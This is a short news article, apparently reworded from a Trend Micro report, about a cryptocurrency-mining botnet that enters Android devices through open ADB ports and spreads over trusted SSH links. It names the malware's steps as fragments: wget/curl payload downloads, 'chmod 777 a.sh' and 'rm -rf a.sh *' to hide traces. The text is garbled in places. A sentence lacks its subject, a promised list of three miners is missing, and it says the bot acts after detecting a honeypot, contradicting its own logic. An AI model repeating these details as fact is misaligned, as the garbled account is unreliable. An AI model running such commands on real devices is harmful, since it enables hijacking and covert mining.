A new cryptocurrency-mining botnet has been found exploiting Android Debug Bridge ports, a method built to fix app defects installed on a majority of Android phones and tablets.
The botnet malware, as reported by Trend Micro, was detected in 21 countries and is most widespread in South Korea.
The assault takes advantage of the way open ADB ports don’t demand authentication by default, and once installed is designed to spread to any device that has previously shared an SSH connection. SSH interactions connect a wide range of devices – everything right from mobile to the Internet of Things ( IoT ) gadgets – which means a lot of products are susceptible.
“Being a known device means the two systems can communicate with each other without any further authentication after the initial key exchange, each system considers the other as safe,” the researchers say. “The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections .”
It begins with an IP address.
arrives through the ADB and uses the command shell to upgrade the working directory to “/data/local/tmp,” as .tmp files often have default permission to implement commands.
As soon as the bot determines its entered a honeypot, it utilizes the wget command to download the payload of three distinct miners and curl if wget is not present in the infected system.
The malware determines which miner is best suited to exploit the victim depending on the system’s manufacturer, architecture, processor type, and hardware.
An additional command, chmod 777 a .sh, is then executed to change the permission settings of the malicious drop. Finally, the bot conceals itself from the host using another command, rm -rf a .sh *, to delete the downloaded file. This also hides the trail of where the bug originated from as it spreads to other victims.
Experts examined the invading script and identified the three potential miners that can be used in the attack – all delivered by the same URL – are :
They also found the script improves the host’s memory by enabling HugePages, which enables memory pages that are greater than its default size, to optimize mining output.
If miners are already found using the system the botnet attempts to invalidate their URL and kill them by switching the host code.
Pernicious and hazardous crypto mining drops are continually evolving new ways to exploit their victims. Last summer, Trend Micro observed another ADB-exploiting that they dubbed the Satoshi Variant.
Outlaw, was spotted in the past weeks spreading an additional Monero mining variant across China through brute-force attacks against servers. At the time experts hadn’t determined whether the botnet had started mining operations, but found an Android APK in the script, indicating Android devices may be focused.